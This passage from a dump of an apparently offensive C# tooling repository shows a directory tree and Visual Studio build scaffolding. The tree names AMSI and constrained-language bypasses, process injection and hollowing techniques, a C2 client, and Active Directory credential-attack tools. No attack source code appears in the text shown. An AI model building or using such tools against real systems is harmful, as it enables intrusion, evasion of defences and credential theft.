├── Active Directory Tools ├── ADAutoEnum │ ├── .vs │ │ └── ADautoenum │ │ │ └── v16 │ │ │ ├── .suo │ │ │ └── Server │ │ │ └── sqlite3 │ │ │ ├── db.lock │ │ │ ├── storage.ide │ │ │ ├── storage.ide-shm │ │ │ └── storage.ide-wal │ ├── ADautoenum.sln │ └── ADautoenum │ │ ├── ADautoenum.csproj │ │ ├── App.config │ │ ├── Program.cs │ │ ├── Properties │ │ └── AssemblyInfo.cs │ │ ├── bin │ │ └── Debug │ │ │ ├── ADautoenum.exe │ │ │ ├── ADautoenum.exe.config │ │ │ └── ADautoenum.pdb │ │ └── obj │ │ └── Debug │ │ ├── ADautoenum.csproj.FileListAbsolute.txt │ │ ├── ADautoenum.csprojAssemblyReference.cache │ │ ├── ADautoenum.exe │ │ ├── ADautoenum.pdb │ │ └── DesignTimeResolveAssemblyReferencesInput.cache ├── AS-REPRoastable │ ├── .vs │ │ └── my practice │ │ │ ├── DesignTimeBuild │ │ │ └── .dtbcache │ │ │ └── v16 │ │ │ ├── .suo │ │ │ └── Server │ │ │ └── sqlite3 │ │ │ ├── db.lock │ │ │ └── storage.ide │ ├── my practice.sln │ └── my practice │ │ ├── Class1.cs │ │ ├── bin │ │ ├── Debug │ │ │ └── net48 │ │ │ │ ├── ObjectDumping.dll │ │ │ │ ├── my practice.exe │ │ │ │ ├── my practice.exe.config │ │ │ │ └── my practice.pdb │ │ └── Release │ │ │ └── net48 │ │ │ ├── my practice.exe │ │ │ ├── my practice.exe.config │ │ │ └── my practice.pdb │ │ ├── my practice.csproj │ │ └── obj │ │ ├── Debug │ │ ├── net48 │ │ │ ├── my practice.AssemblyInfo.cs │ │ │ ├── my practice.AssemblyInfoInputs.cache │ │ │ ├── my practice.assets.cache │ │ │ ├── my practice.csproj.CopyComplete │ │ │ ├── my practice.csproj.FileListAbsolute.txt │ │ │ ├── my practice.exe │ │ │ ├── my practice.exe.withSupportedRuntime.config │ │ │ └── my practice.pdb │ │ └── netstandard2.0 │ │ │ ├── my practice.AssemblyInfo.cs │ │ │ ├── my practice.AssemblyInfoInputs.cache │ │ │ ├── my practice.assets.cache │ │ │ └── my practice.csprojAssemblyReference.cache │ │ ├── Release │ │ └── net48 │ │ │ ├── my practice.AssemblyInfo.cs │ │ │ ├── my practice.AssemblyInfoInputs.cache │ │ │ ├── my practice.assets.cache │ │ │ ├── my practice.csproj.FileListAbsolute.txt │ │ │ ├── my practice.csprojAssemblyReference.cache │ │ │ ├── my practice.exe │ │ │ ├── my practice.exe.withSupportedRuntime.config │ │ │ └── my practice.pdb │ │ ├── my practice.csproj.nuget.cache │ │ ├── my practice.csproj.nuget.dgspec.json │ │ ├── my practice.csproj.nuget.g.props │ │ ├── my practice.csproj.nuget.g.targets │ │ └── project.assets.json ├── CLM-Bypass │ ├── .vs │ │ └── Runspaces2 │ │ │ └── v16 │ │ │ ├── .suo │ │ │ └── Server │ │ │ └── sqlite3 │ │ │ ├── db.lock │ │ │ └── storage.ide │ ├── Runspaces2.sln │ └── Runspaces2 │ │ ├── App.config │ │ ├── Program.cs │ │ ├── Properties │ │ └── AssemblyInfo.cs │ │ ├── Runspaces2.csproj │ │ ├── bin │ │ └── Debug │ │ │ ├── Runspaces2.exe │ │ │ ├── Runspaces2.exe.config │ │ │ ├── Runspaces2.pdb │ │ │ ├── System.Management.Automation.dll │ │ │ └── test.txt │ │ └── obj │ │ └── Debug │ │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ │ ├── Runspaces2.csproj.CopyComplete │ │ ├── Runspaces2.csproj.FileListAbsolute.txt │ │ ├── Runspaces2.exe │ │ └── Runspaces2.pdb ├── EnablePrivilege │ ├── .vs │ │ └── TokenInformation │ │ │ └── v16 │ │ │ ├── .suo │ │ │ └── Server │ │ │ └── sqlite3 │ │ │ ├── db.lock │ │ │ └── storage.ide │ ├── TokenInformation.sln │ └── TokenInformation │ │ ├── App.config │ │ ├── Program.cs │ │ ├── Properties │ │ └── AssemblyInfo.cs │ │ ├── TokenInformation.csproj │ │ ├── bin │ │ └── Debug │ │ │ ├── TokenInformation.exe │ │ │ ├── TokenInformation.exe.config │ │ │ └── TokenInformation.pdb │ │ └── obj │ │ └── Debug │ │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ │ ├── TokenInformation.csproj.FileListAbsolute.txt │ │ ├── TokenInformation.csprojAssemblyReference.cache │ │ ├── TokenInformation.exe │ │ └── TokenInformation.pdb ├── Get-DCSyncUsers │ ├── .vs │ │ └── ACL101 │ │ │ └── v16 │ │ │ ├── .suo │ │ │ └── Server │ │ │ └── sqlite3 │ │ │ ├── db.lock │ │ │ ├── storage.ide │ │ │ ├── storage.ide-shm │ │ │ └── storage.ide-wal │ ├── ACL101.sln │ └── ACL101 │ │ ├── ACL101.csproj │ │ ├── App.config │ │ ├── Program.cs │ │ ├── Properties │ │ └── AssemblyInfo.cs │ │ ├── bin │ │ └── Debug │ │ │ ├── ACL101.exe │ │ │ ├── ACL101.exe.config │ │ │ └── ACL101.pdb │ │ └── obj │ │ └── Debug │ │ ├── ACL101.csproj.FileListAbsolute.txt │ │ ├── ACL101.csprojAssemblyReference.cache │ │ ├── ACL101.exe │ │ ├── ACL101.pdb │ │ └── DesignTimeResolveAssemblyReferencesInput.cache ├── Get-NestedMembersofGroup │ ├── .vs │ │ └── GetGroup │ │ │ ├── DesignTimeBuild │ │ │ └── .dtbcache │ │ │ └── v16 │ │ │ ├── .suo │ │ │ └── Server │ │ │ └── sqlite3 │ │ │ ├── db.lock │ │ │ ├── storage.ide │ │ │ ├── storage.ide-shm │ │ │ └── storage.ide-wal │ ├── GetGroup.sln │ └── GetGroup │ │ ├── Class1.cs │ │ ├── GetGroup.csproj │ │ ├── bin │ │ └── Debug │ │ │ └── net48 │ │ │ ├── GetGroup.exe │ │ │ ├── GetGroup.exe.config │ │ │ └── GetGroup.pdb │ │ └── obj │ │ ├── Debug │ │ ├── net48 │ │ │ ├── GetGroup.AssemblyInfo.cs │ │ │ ├── GetGroup.AssemblyInfoInputs.cache │ │ │ ├── GetGroup.assets.cache │ │ │ ├── GetGroup.csproj.FileListAbsolute.txt │ │ │ ├── GetGroup.csprojAssemblyReference.cache │ │ │ ├── GetGroup.exe │ │ │ ├── GetGroup.exe.withSupportedRuntime.config │ │ │ └── GetGroup.pdb │ │ └── netstandard2.0 │ │ │ ├── GetGroup.AssemblyInfo.cs │ │ │ ├── GetGroup.AssemblyInfoInputs.cache │ │ │ ├── GetGroup.assets.cache │ │ │ └── GetGroup.csprojAssemblyReference.cache │ │ ├── GetGroup.csproj.nuget.cache │ │ ├── GetGroup.csproj.nuget.dgspec.json │ │ ├── GetGroup.csproj.nuget.g.props │ │ ├── GetGroup.csproj.nuget.g.targets │ │ └── project.assets.json ├── Get-UsersSPN │ ├── .vs │ │ └── GetUsersSPN │ │ │ └── v16 │ │ │ ├── .suo │ │ │ └── Server │ │ │ └── sqlite3 │ │ │ ├── db.lock │ │ │ ├── storage.ide │ │ │ ├── storage.ide-shm │ │ │ └── storage.ide-wal │ ├── GetUsersSPN.sln │ └── GetUsersSPN │ │ ├── Class1.cs │ │ ├── GetUsersSPN.csproj │ │ ├── bin │ │ └── Debug │ │ │ └── net48 │ │ │ ├── GetUsersSPN.exe │ │ │ ├── GetUsersSPN.exe.config │ │ │ └── GetUsersSPN.pdb │ │ └── obj │ │ ├── Debug │ │ ├── net48 │ │ │ ├── GetUsersSPN.AssemblyInfo.cs │ │ │ ├── GetUsersSPN.AssemblyInfoInputs.cache │ │ │ ├── GetUsersSPN.assets.cache │ │ │ ├── GetUsersSPN.csproj.FileListAbsolute.txt │ │ │ ├── GetUsersSPN.csprojAssemblyReference.cache │ │ │ ├── GetUsersSPN.exe │ │ │ ├── GetUsersSPN.exe.withSupportedRuntime.config │ │ │ └── GetUsersSPN.pdb │ │ └── netstandard2.0 │ │ │ ├── GetUsersSPN.AssemblyInfo.cs │ │ │ ├── GetUsersSPN.AssemblyInfoInputs.cache │ │ │ ├── GetUsersSPN.assets.cache │ │ │ └── GetUsersSPN.csprojAssemblyReference.cache │ │ ├── GetUsersSPN.csproj.nuget.cache │ │ ├── GetUsersSPN.csproj.nuget.dgspec.json │ │ ├── GetUsersSPN.csproj.nuget.g.props │ │ ├── GetUsersSPN.csproj.nuget.g.targets │ │ └── project.assets.json └── LSA API │ └── LSAEnumerateLogonSessions │ ├── .vs │ └── LsaEnumerateLoggedonSessions │ │ └── v16 │ │ ├── .suo │ │ └── Server │ │ └── sqlite3 │ │ ├── db.lock │ │ └── storage.ide │ ├── LsaEnumerateLoggedonSessions.sln │ └── LsaEnumerateLoggedonSessions │ ├── App.config │ ├── LsaEnumerateLoggedonSessions.csproj │ ├── Program.cs │ ├── Properties │ └── AssemblyInfo.cs │ ├── bin │ └── Debug │ │ ├── LsaEnumerateLoggedonSessions.exe │ │ ├── LsaEnumerateLoggedonSessions.exe.config │ │ └── LsaEnumerateLoggedonSessions.pdb │ └── obj │ └── Debug │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ ├── LsaEnumerateLoggedonSessions.csproj.FileListAbsolute.txt │ ├── LsaEnumerateLoggedonSessions.exe │ └── LsaEnumerateLoggedonSessions.pdb ├── C2Client ├── .vs │ └── C2Client │ │ └── v16 │ │ ├── .suo │ │ └── Server │ │ └── sqlite3 │ │ ├── db.lock │ │ ├── storage.ide │ │ ├── storage.ide-shm │ │ └── storage.ide-wal ├── C2Client.sln └── C2Client │ ├── App.config │ ├── C2Client.csproj │ ├── C2Client.csproj.user │ ├── Program.cs │ ├── Properties │ └── AssemblyInfo.cs │ ├── bin │ └── Debug │ │ ├── C2Client.exe │ │ ├── C2Client.exe.config │ │ ├── C2Client.pdb │ │ ├── New folder │ │ ├── flag.txt │ │ ├── flag1.txt │ │ └── flag2.txt │ │ ├── System.Management.Automation.dll │ │ └── Windows Server 2016-2022-03-10-08-32-41.png │ ├── functions.cs │ ├── obj │ └── Debug │ │ ├── C2Client.csproj.CopyComplete │ │ ├── C2Client.csproj.FileListAbsolute.txt │ │ ├── C2Client.csprojAssemblyReference.cache │ │ ├── C2Client.exe │ │ ├── C2Client.pdb │ │ └── DesignTimeResolveAssemblyReferencesInput.cache │ └── winapi.cs ├── Code Injections ├── API Hashing │ ├── .vs │ │ └── apihashing │ │ │ └── v16 │ │ │ ├── .suo │ │ │ └── Server │ │ │ └── sqlite3 │ │ │ ├── db.lock │ │ │ ├── storage.ide │ │ │ ├── storage.ide-shm │ │ │ └── storage.ide-wal │ ├── apihashing.sln │ └── apihashing │ │ ├── App.config │ │ ├── Program.cs │ │ ├── Properties │ │ └── AssemblyInfo.cs │ │ ├── apihashing.csproj │ │ ├── bin │ │ └── Debug │ │ │ ├── apihashing.exe │ │ │ ├── apihashing.exe.config │ │ │ └── apihashing.pdb │ │ ├── obj │ │ └── Debug │ │ │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ │ │ ├── apihashing.csproj.FileListAbsolute.txt │ │ │ ├── apihashing.csprojAssemblyReference.cache │ │ │ ├── apihashing.exe │ │ │ └── apihashing.pdb │ │ └── winapi.cs ├── PE64Loader │ ├── .vs │ │ └── PE64Loader │ │ │ └── v16 │ │ │ ├── .suo │ │ │ └── Server │ │ │ └── sqlite3 │ │ │ ├── db.lock │ │ │ ├── storage.ide │ │ │ ├── storage.ide-shm │ │ │ └── storage.ide-wal │ ├── PE64Loader.sln │ └── PE64Loader │ │ ├── App.config │ │ ├── PE64Loader.csproj │ │ ├── PE64Loader.csproj.user │ │ ├── Program.cs │ │ ├── Properties │ │ └── AssemblyInfo.cs │ │ ├── bin │ │ └── Debug │ │ │ ├── PE64Loader.exe │ │ │ ├── PE64Loader.exe.config │ │ │ └── PE64Loader.pdb │ │ └── obj │ │ └── Debug │ │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ │ ├── PE64Loader.csproj.FileListAbsolute.txt │ │ ├── PE64Loader.csprojAssemblyReference.cache │ │ ├── PE64Loader.exe │ │ └── PE64Loader.pdb ├── PELoader │ ├── .vs │ │ └── PELoader │ │ │ └── v16 │ │ │ ├── .suo │ │ │ └── Server │ │ │ └── sqlite3 │ │ │ ├── db.lock │ │ │ ├── storage.ide │ │ │ ├── storage.ide-shm │ │ │ └── storage.ide-wal │ ├── PELoader.sln │ └── PELoader │ │ ├── App.config │ │ ├── PELoader.csproj │ │ ├── Program.cs │ │ ├── Properties │ │ └── AssemblyInfo.cs │ │ ├── bin │ │ └── Debug │ │ │ ├── PELoader.exe │ │ │ ├── PELoader.exe.config │ │ │ └── PELoader.pdb │ │ └── obj │ │ └── Debug │ │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ │ ├── PELoader.csproj.FileListAbsolute.txt │ │ ├── PELoader.csprojAssemblyReference.cache │ │ ├── PELoader.exe │ │ └── PELoader.pdb ├── ProcessHollow64 │ ├── .vs │ │ └── process_hollowing │ │ │ └── v16 │ │ │ ├── .suo │ │ │ └── Server │ │ │ └── sqlite3 │ │ │ ├── db.lock │ │ │ └── storage.ide │ ├── process_hollowing.sln │ └── process_hollowing │ │ ├── App.config │ │ ├── Program.cs │ │ ├── Properties │ │ └── AssemblyInfo.cs │ │ ├── bin │ │ └── Debug │ │ │ ├── process_hollowing.exe │ │ │ ├── process_hollowing.exe.config │ │ │ └── process_hollowing.pdb │ │ ├── obj │ │ └── Debug │ │ │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ │ │ ├── process_hollowing.csproj.FileListAbsolute.txt │ │ │ ├── process_hollowing.csprojAssemblyReference.cache │ │ │ ├── process_hollowing.exe │ │ │ └── process_hollowing.pdb │ │ └── process_hollowing.csproj ├── Processdoppelgang64 │ ├── .vs │ │ └── ProcessDoppleganging │ │ │ └── v16 │ │ │ ├── .suo │ │ │ └── Server │ │ │ └── sqlite3 │ │ │ ├── db.lock │ │ │ ├── storage.ide │ │ │ ├── storage.ide-shm │ │ │ └── storage.ide-wal │ ├── ProcessDoppleganging.sln │ └── ProcessDoppleganging │ │ ├── App.config │ │ ├── ProcessDoppleganging.csproj │ │ ├── Program.cs │ │ ├── Properties │ │ └── AssemblyInfo.cs │ │ ├── bin │ │ └── Debug │ │ │ ├── ProcessDoppleganging.exe │ │ │ ├── ProcessDoppleganging.exe.config │ │ │ ├── ProcessDoppleganging.pdb │ │ │ └── calc2.exe │ │ ├── obj │ │ └── Debug │ │ │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ │ │ ├── ProcessDoppleganging.csproj.FileListAbsolute.txt │ │ │ ├── ProcessDoppleganging.csprojAssemblyReference.cache │ │ │ ├── ProcessDoppleganging.exe │ │ │ └── ProcessDoppleganging.pdb │ │ └── winapi.cs ├── Queue APC Injections │ ├── .vs │ │ └── apcinjection │ │ │ └── v16 │ │ │ ├── .suo │ │ │ └── Server │ │ │ └── sqlite3 │ │ │ ├── db.lock │ │ │ ├── storage.ide │ │ │ ├── storage.ide-shm │ │ │ └── storage.ide-wal │ ├── apcinjection.sln │ └── apcinjection │ │ ├── App.config │ │ ├── Program.cs │ │ ├── Properties │ │ └── AssemblyInfo.cs │ │ ├── apcinjection.csproj │ │ ├── bin │ │ └── Debug │ │ │ ├── apcinjection.exe │ │ │ ├── apcinjection.exe.config │ │ │ └── apcinjection.pdb │ │ ├── obj │ │ └── Debug │ │ │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ │ │ ├── apcinjection.csproj.FileListAbsolute.txt │ │ │ ├── apcinjection.csprojAssemblyReference.cache │ │ │ ├── apcinjection.exe │ │ │ └── apcinjection.pdb │ │ └── winapi.cs ├── SectionMap │ ├── .vs │ │ └── sectionmap │ │ │ └── v16 │ │ │ ├── .suo │ │ │ └── Server │ │ │ └── sqlite3 │ │ │ ├── db.lock │ │ │ ├── storage.ide │ │ │ ├── storage.ide-shm │ │ │ └── storage.ide-wal │ ├── sectionmap.sln │ └── sectionmap │ │ ├── App.config │ │ ├── Program.cs │ │ ├── Properties │ │ └── AssemblyInfo.cs │ │ ├── bin │ │ └── Debug │ │ │ ├── sectionmap.exe │ │ │ ├── sectionmap.exe.config │ │ │ └── sectionmap.pdb │ │ ├── obj │ │ └── Debug │ │ │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ │ │ ├── sectionmap.csproj.FileListAbsolute.txt │ │ │ ├── sectionmap.csprojAssemblyReference.cache │ │ │ ├── sectionmap.exe │ │ │ └── sectionmap.pdb │ │ ├── sectionmap.csproj │ │ └── winapi.cs └── virtualallocex_remoteprocess │ ├── .vs │ └── virtualallocex_remoteprocess │ │ └── v16 │ │ ├── .suo │ │ └── Server │ │ └── sqlite3 │ │ ├── db.lock │ │ ├── storage.ide │ │ ├── storage.ide-shm │ │ └── storage.ide-wal │ ├── virtualallocex_remoteprocess.sln │ └── virtualallocex_remoteprocess │ ├── App.config │ ├── Program.cs │ ├── Properties │ └── AssemblyInfo.cs │ ├── bin │ └── Debug │ │ ├── enableprivs.ps1 │ │ ├── virtualallocex_remoteprocess.exe │ │ ├── virtualallocex_remoteprocess.exe.config │ │ └── virtualallocex_remoteprocess.pdb │ ├── obj │ └── Debug │ │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ │ ├── virtualallocex_remoteprocess.csproj.FileListAbsolute.txt │ │ ├── virtualallocex_remoteprocess.csprojAssemblyReference.cache │ │ ├── virtualallocex_remoteprocess.exe │ │ └── virtualallocex_remoteprocess.pdb │ └── virtualallocex_remoteprocess.csproj ├── Get-WritableFiles ├── .vs │ └── Get-Writable │ │ ├── DesignTimeBuild │ │ └── .dtbcache │ │ └── v16 │ │ ├── .suo │ │ └── Server │ │ └── sqlite3 │ │ ├── db.lock │ │ └── storage.ide ├── Get-Writable.sln └── Get-Writable │ ├── Class1.cs │ ├── Get-Writable.csproj │ ├── bin │ └── Debug │ │ └── net48 │ │ ├── Get-Writable.exe │ │ ├── Get-Writable.exe.config │ │ └── Get-Writable.pdb │ └── obj │ ├── Debug │ ├── net48 │ │ ├── Get-Writable.AssemblyInfo.cs │ │ ├── Get-Writable.AssemblyInfoInputs.cache │ │ ├── Get-Writable.assets.cache │ │ ├── Get-Writable.csproj.FileListAbsolute.txt │ │ ├── Get-Writable.exe │ │ ├── Get-Writable.exe.withSupportedRuntime.config │ │ └── Get-Writable.pdb │ └── netstandard2.0 │ │ ├── Get-Writable.AssemblyInfo.cs │ │ ├── Get-Writable.AssemblyInfoInputs.cache │ │ ├── Get-Writable.assets.cache │ │ └── Get-Writable.csprojAssemblyReference.cache │ ├── Get-Writable.csproj.nuget.cache │ ├── Get-Writable.csproj.nuget.dgspec.json │ ├── Get-Writable.csproj.nuget.g.props │ ├── Get-Writable.csproj.nuget.g.targets │ └── project.assets.json ├── README.md ├── amsipatch64 ├── .vs │ └── amsibypass │ │ └── v16 │ │ ├── .suo │ │ └── Server │ │ └── sqlite3 │ │ ├── db.lock │ │ ├── storage.ide │ │ ├── storage.ide-shm │ │ └── storage.ide-wal ├── amsibypass.sln └── amsibypass │ ├── App.config │ ├── Program.cs │ ├── Properties │ └── AssemblyInfo.cs │ ├── amsipatch64.csproj │ ├── bin │ └── Debug │ │ ├── amsibypass.exe │ │ ├── amsibypass.exe.config │ │ └── amsibypass.pdb │ ├── mylib.cs │ └── obj │ └── Debug │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ ├── amsibypass.csproj.FileListAbsolute.txt │ ├── amsibypass.exe │ ├── amsibypass.pdb │ ├── amsipatch64.csproj.FileListAbsolute.txt │ └── amsipatch64.csprojAssemblyReference.cache └── api hooking ├── .vs └── api hooking │ └── v16 │ ├── .suo │ └── Server │ └── sqlite3 │ ├── db.lock │ ├── storage.ide │ ├── storage.ide-shm │ └── storage.ide-wal ├── api hooking.sln └── api hooking ├── App.config ├── Program.cs ├── Properties └── AssemblyInfo.cs ├── api hooking.csproj ├── bin └── Debug │ ├── api hooking.exe │ ├── api hooking.exe.config │ └── api hooking.pdb ├── mylib.cs └── obj └── Debug ├── DesignTimeResolveAssemblyReferencesInput.cache ├── api hooking.csproj.FileListAbsolute.txt ├── api hooking.csprojAssemblyReference.cache ├── api hooking.exe └── api hooking.pdb /Active Directory Tools/ADAutoEnum/.vs/ADautoenum/v16/.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/ADAutoEnum/.vs/ADautoenum/v16/.suo -------------------------------------------------------------------------------- /Active Directory Tools/ADAutoEnum/.vs/ADautoenum/v16/Server/sqlite3/db.lock: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/ADAutoEnum/.vs/ADautoenum/v16/Server/sqlite3/db.lock -------------------------------------------------------------------------------- /Active Directory Tools/ADAutoEnum/.vs/ADautoenum/v16/Server/sqlite3/storage.ide: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/ADAutoEnum/.vs/ADautoenum/v16/Server/sqlite3/storage.ide -------------------------------------------------------------------------------- /Active Directory Tools/ADAutoEnum/.vs/ADautoenum/v16/Server/sqlite3/storage.ide-shm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/ADAutoEnum/.vs/ADautoenum/v16/Server/sqlite3/storage.ide-shm -------------------------------------------------------------------------------- /Active Directory Tools/ADAutoEnum/.vs/ADautoenum/v16/Server/sqlite3/storage.ide-wal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/ADAutoEnum/.vs/ADautoenum/v16/Server/sqlite3/storage.ide-wal -------------------------------------------------------------------------------- /Active Directory Tools/ADAutoEnum/ADautoenum.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.29318.209 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "ADautoenum", "ADautoenum\ADautoenum.csproj", "{77FB15BE-D8C7-4506-804E-520AB48DFDDA}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {77FB15BE-D8C7-4506-804E-520AB48DFDDA}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {77FB15BE-D8C7-4506-804E-520AB48DFDDA}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {77FB15BE-D8C7-4506-804E-520AB48DFDDA}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {77FB15BE-D8C7-4506-804E-520AB48DFDDA}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {7B185530-0F07-4606-A2DE-55B3442C2760} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /Active Directory Tools/ADAutoEnum/ADautoenum/App.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Active Directory Tools/ADAutoEnum/ADautoenum/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("ADautoenum")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("ADautoenum")] 13 | [assembly: AssemblyCopyright("Copyright © 2022")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("77fb15be-d8c7-4506-804e-520ab48dfdda")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /Active Directory Tools/ADAutoEnum/ADautoenum/bin/Debug/ADautoenum.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/ADAutoEnum/ADautoenum/bin/Debug/ADautoenum.exe -------------------------------------------------------------------------------- /Active Directory Tools/ADAutoEnum/ADautoenum/bin/Debug/ADautoenum.exe.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Active Directory Tools/ADAutoEnum/ADautoenum/bin/Debug/ADautoenum.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/ADAutoEnum/ADautoenum/bin/Debug/ADautoenum.pdb -------------------------------------------------------------------------------- /Active Directory Tools/ADAutoEnum/ADautoenum/obj/Debug/ADautoenum.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Users\stargirl\source\repos\ADautoenum\ADautoenum\bin\Debug\ADautoenum.exe.config 2 | C:\Users\stargirl\source\repos\ADautoenum\ADautoenum\bin\Debug\ADautoenum.exe 3 | C:\Users\stargirl\source\repos\ADautoenum\ADautoenum\bin\Debug\ADautoenum.pdb 4 | C:\Users\stargirl\source\repos\ADautoenum\ADautoenum\obj\Debug\ADautoenum.exe 5 | C:\Users\stargirl\source\repos\ADautoenum\ADautoenum\obj\Debug\ADautoenum.pdb 6 | C:\Users\stargirl\source\repos\ADautoenum\ADautoenum\obj\Debug\ADautoenum.csprojAssemblyReference.cache 7 | -------------------------------------------------------------------------------- /Active Directory Tools/ADAutoEnum/ADautoenum/obj/Debug/ADautoenum.csprojAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/ADAutoEnum/ADautoenum/obj/Debug/ADautoenum.csprojAssemblyReference.cache -------------------------------------------------------------------------------- /Active Directory Tools/ADAutoEnum/ADautoenum/obj/Debug/ADautoenum.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/ADAutoEnum/ADautoenum/obj/Debug/ADautoenum.exe -------------------------------------------------------------------------------- /Active Directory Tools/ADAutoEnum/ADautoenum/obj/Debug/ADautoenum.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/ADAutoEnum/ADautoenum/obj/Debug/ADautoenum.pdb -------------------------------------------------------------------------------- /Active Directory Tools/ADAutoEnum/ADautoenum/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/ADAutoEnum/ADautoenum/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /Active Directory Tools/AS-REPRoastable/.vs/my practice/DesignTimeBuild/.dtbcache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/AS-REPRoastable/.vs/my practice/DesignTimeBuild/.dtbcache -------------------------------------------------------------------------------- /Active Directory Tools/AS-REPRoastable/.vs/my practice/v16/.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/AS-REPRoastable/.vs/my practice/v16/.suo -------------------------------------------------------------------------------- /Active Directory Tools/AS-REPRoastable/.vs/my practice/v16/Server/sqlite3/db.lock: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/AS-REPRoastable/.vs/my practice/v16/Server/sqlite3/db.lock -------------------------------------------------------------------------------- /Active Directory Tools/AS-REPRoastable/.vs/my practice/v16/Server/sqlite3/storage.ide: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/AS-REPRoastable/.vs/my practice/v16/Server/sqlite3/storage.ide -------------------------------------------------------------------------------- /Active Directory Tools/AS-REPRoastable/my practice.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.29318.209 5 | 